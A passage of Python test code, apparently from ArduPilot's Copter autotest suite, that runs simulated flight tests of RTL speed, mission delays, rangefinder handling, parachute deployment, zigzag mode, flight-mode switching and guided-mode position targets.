wpnav_speed_ms = 4
wpnav_accel_mss = 3
tolerance = 0.5
self.load_mission("copter_rtl_speed.txt")
self.set_parameter('WPNAV_ACCEL', wpnav_accel_mss * 100)
self.set_parameter('RTL_SPEED', rtl_speed_ms * 100)
self.set_parameter('WPNAV_SPEED', wpnav_speed_ms * 100)
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_altitude(19, 25, relative=True)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, timeout=20)
self.change_mode('RTL')
self.wait_groundspeed(rtl_speed_ms-tolerance, rtl_speed_ms+tolerance)
self.monitor_groundspeed(rtl_speed_ms, timeout=5)
self.change_mode('AUTO')
self.wait_groundspeed(0-tolerance, 0+tolerance)
self.wait_groundspeed(wpnav_speed_ms-tolerance, wpnav_speed_ms+tolerance)
self.monitor_groundspeed(wpnav_speed_ms, tolerance=0.6, timeout=5)
self.do_RTL()
def fly_nav_delay(self):
"""Fly a simple mission that has a delay in it."""
self.load_mission("copter_nav_delay.txt")
self.set_parameter("DISARM_DELAY", 0)
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_start = -1
count_stop = -1
tstart = self.get_sim_time()
last_mission_current_msg = 0
last_seq = None
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 200:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == 3:
at_delay_item = "(At delay item)"
if count_start == -1:
count_start = now
if ((now - last_mission_current_msg) > 1 or m.seq != last_seq):
dist = None
x = self.mav.messages.get("NAV_CONTROLLER_OUTPUT", None)
if x is not None:
dist = x.wp_dist
self.progress("MISSION_CURRENT.seq=%u dist=%s %s" %
(m.seq, dist, at_delay_item))
last_mission_current_msg = self.get_sim_time_cached()
last_seq = m.seq
if m.seq > 3:
if count_stop == -1:
count_stop = now
calculated_delay = count_stop - count_start
want_delay = 59 # should reflect what's in the mission file
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, want_delay))
if calculated_delay < want_delay:
raise NotAchievedException("Did not delay for long enough")
def test_rangefinder(self):
ex = None
self.context_push()
self.progress("Making sure we don't ordinarily get RANGEFINDER")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=5)
if m is not None:
raise NotAchievedException("Received unexpected RANGEFINDER msg")
# may need to force a rotation if some other test has used the
# rangefinder...
self.progress("Ensure no RFND messages in log")
self.set_parameter("LOG_DISARMED", 1)
if self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Found unexpected RFND message")
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl()
self.progress("Making sure we now get RANGEFINDER messages")
m = self.mav.recv_match(type='RANGEFINDER',
blocking=True,
timeout=10)
if m is None:
raise NotAchievedException("Did not get expected RANGEFINDER msg")
self.progress("Checking RangeFinder is marked as enabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.progress("Disabling laser using switch")
self.set_rc(9, 1000)
self.delay_sim_time(1)
self.progress("Checking RangeFinder is marked as disabled in mavlink")
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser enabled in SYS_STATUS")
self.progress("Re-enabling rangefinder")
self.set_rc(9, 2000)
self.delay_sim_time(1)
m = self.mav.recv_match(type='SYS_STATUS',
blocking=True,
timeout=10)
flags = m.onboard_control_sensors_enabled
if not flags & mavutil.mavlink.MAV_SYS_STATUS_SENSOR_LASER_POSITION:
raise NotAchievedException("Laser not enabled in SYS_STATUS")
self.takeoff(10, mode="LOITER")
m_r = self.mav.recv_match(type='RANGEFINDER',
blocking=True)
m_p = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
if abs(m_r.distance - m_p.relative_alt/1000) > 1:
raise NotAchievedException(
"rangefinder/global position int mismatch %0.2f vs %0.2f" %
(m_r.distance, m_p.relative_alt/1000))
self.land_and_disarm()
if not self.current_onboard_log_contains_message("RFND"):
raise NotAchievedException("Did not see expected RFND message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_terrain_spline_mission(self):
self.set_parameter("AUTO_OPTIONS", 3)
self.set_parameter("TERRAIN_ENABLE", 0)
self.load_mission("wp.txt")
self.change_mode('AUTO')
self.wait_ready_to_arm()
self.arm_vehicle()
self.wait_waypoint(4, 4)
self.wait_disarmed()
def test_surface_tracking(self):
ex = None
self.context_push()
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
try:
self.set_analog_rangefinder_parameters()
self.set_parameter("RC9_OPTION", 10) # rangefinder
self.set_rc(9, 2000)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.takeoff(10, mode="LOITER")
lower_surface_pos = mavutil.location(-35.362421, 149.164534, 584, 270)
here = self.mav.location()
bearing = self.get_bearing(here, lower_surface_pos)
self.change_mode("GUIDED")
self.guided_achieve_heading(bearing)
self.change_mode("LOITER")
self.delay_sim_time(2)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
orig_absolute_alt_mm = m.alt
self.progress("Original alt: absolute=%f" % orig_absolute_alt_mm)
self.progress("Flying somewhere which surface is known lower compared to takeoff point")
self.set_rc(2, 1450)
tstart = self.get_sim_time()
while True:
if self.get_sim_time() - tstart > 200:
raise NotAchievedException("Did not reach lower point")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
x = mavutil.location(m.lat/1e7, m.lon/1e7, m.alt/1e3, 0)
dist = self.get_distance(x, lower_surface_pos)
delta = (orig_absolute_alt_mm - m.alt)/1000.0
self.progress("Distance: %fm abs-alt-delta: %fm" %
(dist, delta))
if dist < 15:
if delta < 0.8:
raise NotAchievedException("Did not dip in altitude as expected")
break
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.stop_mavproxy(mavproxy)
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_rangefinder_switchover(self):
"""test that the EKF correctly handles the switchover between baro and rangefinder"""
ex = None
self.context_push()
try:
self.set_analog_rangefinder_parameters()
self.set_parameters({
"RNGFND1_MAX_CM": 1500
})
# configure EKF to use rangefinder for altitude at low altitudes
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
if ahrs_ekf_type == 2:
self.set_parameter("EK2_RNG_USE_HGT", 70)
if ahrs_ekf_type == 3:
self.set_parameter("EK3_RNG_USE_HGT", 70)
self.reboot_sitl() # needed for both rangefinder and initial position
self.assert_vehicle_location_is_at_startup_location()
self.change_mode("LOITER")
self.wait_ready_to_arm()
self.arm_vehicle()
self.set_rc(3, 1800)
self.set_rc(2, 1200)
# wait till we get to 50m
self.wait_altitude(50, 52, True, 60)
self.change_mode("RTL")
# wait till we get to 25m
self.wait_altitude(25, 27, True, 120)
# level up
self.set_rc(2, 1500)
self.wait_altitude(14, 15, relative=True)
self.wait_rtl_complete()
except Exception as e:
self.print_exception_caught(e)
self.disarm_vehicle(force=True)
ex = e
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def test_parachute(self):
self.set_rc(9, 1000)
self.set_parameter("CHUTE_ENABLED", 1)
self.set_parameter("CHUTE_TYPE", 10)
self.set_parameter("SERVO9_FUNCTION", 27)
self.set_parameter("SIM_PARA_ENABLE", 1)
self.set_parameter("SIM_PARA_PIN", 9)
self.progress("Test triggering parachute in mission")
self.load_mission("copter_parachute_mission.txt")
self.change_mode('LOITER')
self.wait_ready_to_arm()
self.arm_vehicle()
self.change_mode('AUTO')
self.set_rc(3, 1600)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Test triggering with mavlink message")
self.takeoff(20)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_PARACHUTE,
2, # release
0,
0,
0,
0,
0,
0)
self.wait_statustext('BANG', timeout=60)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("Testing three-position switch")
self.set_parameter("RC9_OPTION", 23) # parachute 3pos
self.progress("Test manual triggering")
self.takeoff(20)
self.set_rc(9, 2000)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_push()
self.progress("Crashing with 3pos switch in enable position")
self.takeoff(40)
self.set_rc(9, 1500)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
self.wait_statustext('BANG', timeout=60)
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.progress("Crashing with 3pos switch in disable position")
loiter_alt = 10
self.takeoff(loiter_alt, mode='LOITER')
self.set_rc(9, 1100)
self.set_parameter("SIM_ENGINE_MUL", 0)
self.set_parameter("SIM_ENGINE_FAIL", 1)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='STATUSTEXT', blocking=True, timeout=1)
if m is None:
continue
if "BANG" in m.text:
self.set_rc(9, 1000)
self.reboot_sitl()
raise NotAchievedException("Parachute deployed when disabled")
self.set_rc(9, 1000)
self.disarm_vehicle(force=True)
self.reboot_sitl()
def test_motortest(self, timeout=60):
self.start_subtest("Testing PWM output")
pwm_in = 1300
# default frame is "+" - start motor of 2 is "B", which is
# motor 1... see
# https://ardupilot.org/copter/docs/connect-escs-and-motors.html
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PWM,
pwm_in, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
# long timeouts here because there's a pause before we start motors
self.wait_servo_channel_value(1, pwm_in, timeout=10)
self.wait_servo_channel_value(4, pwm_in, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing PWM output")
self.start_subtest("Testing percentage output")
percentage = 90.1
# since MOT_SPIN_MIN and MOT_SPIN_MAX are not set, the RC3
# min/max are used.
expected_pwm = 1000 + (self.get_parameter("RC3_MAX") - self.get_parameter("RC3_MIN")) * percentage/100.0
self.progress("expected pwm=%f" % expected_pwm)
self.run_cmd(mavutil.mavlink.MAV_CMD_DO_MOTOR_TEST,
2, # start motor
mavutil.mavlink.MOTOR_TEST_THROTTLE_PERCENT,
percentage, # pwm-to-output
2, # timeout in seconds
2, # number of motors to output
0, # compass learning
0,
timeout=timeout)
self.wait_servo_channel_value(1, expected_pwm, timeout=10)
self.wait_servo_channel_value(4, expected_pwm, timeout=10)
self.wait_statustext("finished motor test")
self.end_subtest("Testing percentage output")
def fly_precision_sitl(self):
"""Use SITL PrecLand backend precision messages to land aircraft."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
self.set_parameter("PLND_TYPE", 4)
self.set_analog_rangefinder_parameters()
self.set_parameter("SIM_SONAR_SCALE", 12)
start = self.mav.location()
target = start
(target.lat, target.lng) = mavextra.gps_offset(start.lat, start.lng, 4, -4)
self.progress("Setting target to %f %f" % (target.lat, target.lng))
self.set_parameter("SIM_PLD_ENABLE", 1)
self.set_parameter("SIM_PLD_LAT", target.lat)
self.set_parameter("SIM_PLD_LON", target.lng)
self.set_parameter("SIM_PLD_HEIGHT", 0)
self.set_parameter("SIM_PLD_ALT_LMT", 15)
self.set_parameter("SIM_PLD_DIST_LMT", 10)
self.reboot_sitl()
self.progress("Waiting for location")
self.zero_throttle()
self.takeoff(10, 1800)
self.change_mode("LAND")
self.wait_landed_and_disarmed()
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_pos = self.mav.location()
delta = self.get_distance(target, new_pos)
self.progress("Landed %f metres from target position" % delta)
max_delta = 1
if delta > max_delta:
raise NotAchievedException("Did not land close enough to target position (%fm > %fm" % (delta, max_delta))
if not self.current_onboard_log_contains_message("PL"):
raise NotAchievedException("Did not see expected PL message")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.zero_throttle()
self.context_pop()
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def get_system_clock_utc(self, time_seconds):
# this is a copy of ArduPilot's AP_RTC function!
# separate time into ms, sec, min, hour and days but all expressed
# in milliseconds
time_ms = time_seconds * 1000
ms = time_ms % 1000
sec_ms = (time_ms % (60 * 1000)) - ms
min_ms = (time_ms % (60 * 60 * 1000)) - sec_ms - ms
hour_ms = (time_ms % (24 * 60 * 60 * 1000)) - min_ms - sec_ms - ms
# convert times as milliseconds into appropriate units
secs = sec_ms / 1000
mins = min_ms / (60 * 1000)
hours = hour_ms / (60 * 60 * 1000)
return (hours, mins, secs, 0)
def calc_delay(self, seconds, delay_for_seconds):
# delay-for-seconds has to be long enough that we're at the
# waypoint before that time. Otherwise we'll try to wait a
# day....
if delay_for_seconds >= 3600:
raise ValueError("Won't handle large delays")
(hours,
mins,
secs,
ms) = self.get_system_clock_utc(seconds)
self.progress("Now is %uh %um %us" % (hours, mins, secs))
secs += delay_for_seconds # add seventeen seconds
mins += int(secs/60)
secs %= 60
hours += int(mins / 60)
mins %= 60
if hours > 24:
raise ValueError("Way too big a delay")
self.progress("Delay until %uh %um %us" %
(hours, mins, secs))
return (hours, mins, secs, 0)
def reset_delay_item(self, seq, seconds_in_future):
frame = mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT
command = mavutil.mavlink.MAV_CMD_NAV_DELAY
# retrieve mission item and check it:
tried_set = False
hours = None
mins = None
secs = None
while True:
self.progress("Requesting item")
self.mav.mav.mission_request_send(1,
1,
seq)
st = self.mav.recv_match(type='MISSION_ITEM',
blocking=True,
timeout=1)
if st is None:
continue
print("Item: %s" % str(st))
have_match = (tried_set and
st.seq == seq and
st.command == command and
st.param2 == hours and
st.param3 == mins and
st.param4 == secs)
if have_match:
return
self.progress("Mission mismatch")
m = None
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 3:
raise NotAchievedException(
"Did not receive MISSION_REQUEST")
self.mav.mav.mission_write_partial_list_send(1,
1,
seq,
seq)
m = self.mav.recv_match(type='MISSION_REQUEST',
blocking=True,
timeout=1)
if m is None:
continue
if m.seq != st.seq:
continue
break
self.progress("Sending absolute-time mission item")
# we have to change out the delay time...
now = self.mav.messages["SYSTEM_TIME"]
if now is None:
raise PreconditionFailedException("Never got SYSTEM_TIME")
if now.time_unix_usec == 0:
raise PreconditionFailedException("system time is zero")
(hours, mins, secs, ms) = self.calc_delay(now.time_unix_usec/1000000, seconds_in_future)
self.mav.mav.mission_item_send(
1, # target system
1, # target component
seq, # seq
frame, # frame
command, # command
0, # current
1, # autocontinue
0, # p1 (relative seconds)
hours, # p2
mins, # p3
secs, # p4
0, # p5
0, # p6
0) # p7
tried_set = True
ack = self.mav.recv_match(type='MISSION_ACK',
blocking=True,
timeout=1)
self.progress("Received ack: %s" % str(ack))
def fly_nav_delay_abstime(self):
"""fly a simple mission that has a delay in it"""
self.fly_nav_delay_abstime_x(87)
def fly_nav_delay_abstime_x(self, delay_for, expected_delay=None):
"""fly a simple mission that has a delay in it, expect a delay"""
if expected_delay is None:
expected_delay = delay_for
self.load_mission("copter_nav_delay.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 3
self.reset_delay_item(delay_item_seq, delay_for)
delay_for_seconds = delay_for
reset_at_m = self.mav.recv_match(type='SYSTEM_TIME', blocking=True)
reset_at = reset_at_m.time_unix_usec/1000000
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
count_stop = -1
tstart = self.get_sim_time()
while self.armed(): # we RTL at end of mission
now = self.get_sim_time_cached()
if now - tstart > 240:
raise AutoTestTimeoutException("Did not disarm as expected")
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
at_delay_item = ""
if m.seq == delay_item_seq:
at_delay_item = "(delay item)"
self.progress("MISSION_CURRENT.seq=%u %s" % (m.seq, at_delay_item))
if m.seq > delay_item_seq:
if count_stop == -1:
count_stop_m = self.mav.recv_match(type='SYSTEM_TIME',
blocking=True)
count_stop = count_stop_m.time_unix_usec/1000000
calculated_delay = count_stop - reset_at
error = abs(calculated_delay - expected_delay)
self.progress("Stopped for %u seconds (want >=%u seconds)" %
(calculated_delay, delay_for_seconds))
if error > 2:
raise NotAchievedException("delay outside expectations")
def fly_nav_takeoff_delay_abstime(self):
"""make sure taking off at a specific time works"""
self.load_mission("copter_nav_delay_takeoff.txt")
self.change_mode("LOITER")
self.wait_ready_to_arm()
delay_item_seq = 2
delay_for_seconds = 77
self.reset_delay_item(delay_item_seq, delay_for_seconds)
reset_at = self.get_sim_time_cached()
self.arm_vehicle()
self.change_mode("AUTO")
self.set_rc(3, 1600)
# should not take off for about least 77 seconds
tstart = self.get_sim_time()
took_off = False
while self.armed():
now = self.get_sim_time_cached()
if now - tstart > 200:
# timeout
break
m = self.mav.recv_match(type='MISSION_CURRENT', blocking=True)
now = self.get_sim_time_cached()
self.progress("%s" % str(m))
if m.seq > delay_item_seq:
if not took_off:
took_off = True
delta_time = now - reset_at
if abs(delta_time - delay_for_seconds) > 2:
raise NotAchievedException((
"Did not take off on time "
"measured=%f want=%f" %
(delta_time, delay_for_seconds)))
if not took_off:
raise NotAchievedException("Did not take off")
def fly_zigzag_mode(self):
'''test zigzag mode'''
# set channel 8 for zigzag savewp and recentre it
self.set_parameter("RC8_OPTION", 61)
self.takeoff(alt_min=5, mode='LOITER')
ZIGZAG = 24
j = 0
slowdown_speed = 0.3 # because Copter takes a long time to actually stop
self.start_subtest("Conduct ZigZag test for all 4 directions")
while j < 4:
self.progress("## Align heading with the run-way (j=%d)##" % j)
self.set_rc(8, 1500)
self.set_rc(4, 1420)
self.wait_heading(352-j*90)
self.set_rc(4, 1500)
self.change_mode(ZIGZAG)
self.progress("## Record Point A ##")
self.set_rc(8, 1100) # record point A
self.set_rc(1, 1700) # fly side-way for 20m
self.wait_distance(20)
self.set_rc(1, 1500)
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## Record Point A ##")
self.set_rc(8, 1500) # pilot always have to cross mid position when changing for low to high position
self.set_rc(8, 1900) # record point B
i = 1
while i < 2:
self.start_subtest("Run zigzag A->B and B->A (i=%d)" % i)
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300)
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900)
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
i = i + 1
# test the case when pilot switch to manual control during the auto flight
self.start_subtest("test the case when pilot switch to manual control during the auto flight")
self.progress("## fly forward for 10 meter ##")
self.set_rc(2, 1300) # fly forward for 10 meter
self.wait_distance(10)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, 0.3) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector BA ##")
self.set_rc(8, 1100) # switch to low position, auto execute vector BA
self.wait_distance(8) # purposely switch to manual halfway
self.set_rc(8, 1500)
self.wait_groundspeed(0, slowdown_speed) # copter should slow down here
self.progress("## Manual control to fly forward ##")
self.set_rc(2, 1300) # manual control to fly forward
self.wait_distance(8)
self.set_rc(2, 1500) # re-centre pitch rc control
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.progress("## continue vector BA ##")
self.set_rc(8, 1100) # copter should continue mission here
self.wait_distance(8) # wait for it to finish rest of BA
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.set_rc(8, 1500) # switch to mid position
self.progress("## auto execute vector AB ##")
self.set_rc(8, 1900) # switch to execute AB again
self.wait_distance(17) # wait for it to finish
self.wait_groundspeed(0, slowdown_speed) # wait until the copter slows down
self.change_mode('LOITER')
j = j + 1
self.do_RTL()
def test_setting_modes_via_modeswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = 5
self.set_parameter("FLTMODE_CH", fltmode_ch)
self.set_rc(fltmode_ch, 1000) # PWM for mode1
testmodes = [("FLTMODE1", 4, "GUIDED", 1165),
("FLTMODE2", 13, "SPORT", 1295),
("FLTMODE3", 6, "RTL", 1425),
("FLTMODE4", 7, "CIRCLE", 1555),
("FLTMODE5", 1, "ACRO", 1685),
("FLTMODE6", 17, "BRAKE", 1815),
]
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_parameter(parm, parm_value)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in testmodes:
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
for mode in reversed(testmodes):
(parm, parm_value, name, pwm) = mode
self.set_rc(fltmode_ch, pwm)
self.wait_mode(name)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def test_setting_modes_via_auxswitch(self):
self.context_push()
ex = None
try:
fltmode_ch = int(self.get_parameter("FLTMODE_CH"))
self.set_rc(fltmode_ch, 1000)
self.wait_mode("CIRCLE")
self.set_rc(9, 1000)
self.set_rc(10, 1000)
self.set_parameter("RC9_OPTION", 18) # land
self.set_parameter("RC10_OPTION", 55) # guided
self.set_rc(9, 1900)
self.wait_mode("LAND")
self.set_rc(10, 1900)
self.wait_mode("GUIDED")
self.set_rc(10, 1000) # this re-polls the mode switch
self.wait_mode("CIRCLE")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
if ex is not None:
raise ex
def fly_guided_stop(self,
timeout=20,
groundspeed_tolerance=0.05,
climb_tolerance=0.01):
"""stop the vehicle moving in guided mode"""
self.progress("Stopping vehicle")
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_BODY_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
0, # x
0, # y
0, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Vehicle did not stop")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % str(m))
if (m.groundspeed < groundspeed_tolerance and
m.climb < climb_tolerance):
break
def fly_guided_move_global_relative_alt(self, lat, lon, alt):
startpos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
lat, # lat
lon, # lon
alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 200:
raise NotAchievedException("Did not move far enough")
# send a position-control command
pos = self.mav.recv_match(type='GLOBAL_POSITION_INT',
blocking=True)
delta = self.get_distance_int(startpos, pos)
self.progress("delta=%f (want >10)" % delta)
if delta > 10:
break
def fly_guided_move_local(self, x, y, z_up, timeout=100):
"""move the vehicle using MAVLINK_MSG_ID_SET_POSITION_TARGET_LOCAL_NED"""
startpos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("startpos=%s" % str(startpos))
tstart = self.get_sim_time()
# send a position-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use-only-x-y-z
x, # x
y, # y
-z_up,# z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not start to move")
m = self.mav.recv_match(type='VFR_HUD', blocking=True)
print("%s" % m)
if m.groundspeed > 0.5:
break
self.progress("Waiting for vehicle to stop...")
self.wait_groundspeed(1, 100, timeout=timeout)
stoppos = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
self.progress("stop_pos=%s" % str(stoppos))
x_achieved = stoppos.x - startpos.x
if x_achieved - x > 1:
raise NotAchievedException("Did not achieve x position: want=%f got=%f" % (x, x_achieved))
y_achieved = stoppos.y - startpos.y
if y_achieved - y > 1:
raise NotAchievedException("Did not achieve y position: want=%f got=%f" % (y, y_achieved))
z_achieved = stoppos.z - startpos.z
if z_achieved - z_up > 1:
raise NotAchievedException("Did not achieve z position: want=%f got=%f" % (z_up, z_achieved))
def test_guided_local_position_target(self, x, y, z_up):
""" Check target position being received by vehicle """
# set POSITION_TARGET_LOCAL_NED message rate using SET_MESSAGE_INTERVAL
self.progress("Setting local target in NED: (%f, %f, %f)" % (x, y, -z_up))
self.progress("Setting rate to 1 Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 1)
# set position target
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111111000, # mask specifying use only xyz
x, # x
y, # y
-z_up, # z
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=2)
self.progress("Received local target: %s" % str(m))
if not (m.type_mask == 0xFFF8 or m.type_mask == 0x0FF8):
raise NotAchievedException("Did not receive proper mask: expected=65528 or 4088, got=%u" % m.type_mask)
if x - m.x > 0.1:
raise NotAchievedException("Did not receive proper target position x: wanted=%f got=%f" % (x, m.x))
if y - m.y > 0.1:
raise NotAchievedException("Did not receive proper target position y: wanted=%f got=%f" % (y, m.y))
if z_up - (-m.z) > 0.1:
raise NotAchievedException("Did not receive proper target position z: wanted=%f got=%f" % (z_up, -m.z))
def test_guided_local_velocity_target(self, vx, vy, vz_up, timeout=3):
" Check local target velocity being recieved by vehicle "
self.progress("Setting local NED velocity target: (%f, %f, %f)" % (vx, vy, -vz_up))
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
# Drain old messages and ignore the ramp-up to the required target velocity
tstart = self.get_sim_time()
while self.get_sim_time_cached() - tstart < timeout:
# send velocity-control command
self.mav.mav.set_position_target_local_ned_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_LOCAL_NED,
0b1111111111000111, # mask specifying use only vx,vy,vz
0, # x
0, # y
0, # z
vx, # vx
vy, # vy
-vz_up, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
raise NotAchievedException("Did not receive any message for 1 sec")
self.progress("Received local target: %s" % str(m))
# Check the last received message
if not (m.type_mask == 0xFFC7 or m.type_mask == 0x0FC7):
raise NotAchievedException("Did not receive proper mask: expected=65479 or 4039, got=%u" % m.type_mask)
if vx - m.vx > 0.1:
raise NotAchievedException("Did not receive proper target velocity vx: wanted=%f got=%f" % (vx, m.vx))
if vy - m.vy > 0.1:
raise NotAchievedException("Did not receive proper target velocity vy: wanted=%f got=%f" % (vy, m.vy))
if vz_up - (-m.vz) > 0.1:
raise NotAchievedException("Did not receive proper target velocity vz: wanted=%f got=%f" % (vz_up, -m.vz))
self.progress("Received proper target velocity commands")
def test_position_target_message_mode(self):
" Ensure that POSITION_TARGET_LOCAL_NED messages are sent in Guided Mode only "
self.hover()
self.change_mode('LOITER')
self.progress("Setting POSITION_TARGET_LOCAL_NED message rate to 10Hz")
self.set_message_rate_hz(mavutil.mavlink.MAVLINK_MSG_ID_POSITION_TARGET_LOCAL_NED, 10)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + 5:
m = self.mav.recv_match(type='POSITION_TARGET_LOCAL_NED', blocking=True, timeout=1)
if m is None:
continue
raise NotAchievedException("Received POSITION_TARGET message in LOITER mode: %s" % str(m))
self.progress("Did not receive any POSITION_TARGET_LOCAL_NED message in LOITER mode. Success")
def earth_to_body(self, vector):
r = mavextra.rotation(self.mav.messages["ATTITUDE"]).invert()
# print("r=%s" % str(r))
return r * vector
def loiter_to_ne(self, x, y, z, timeout=40):
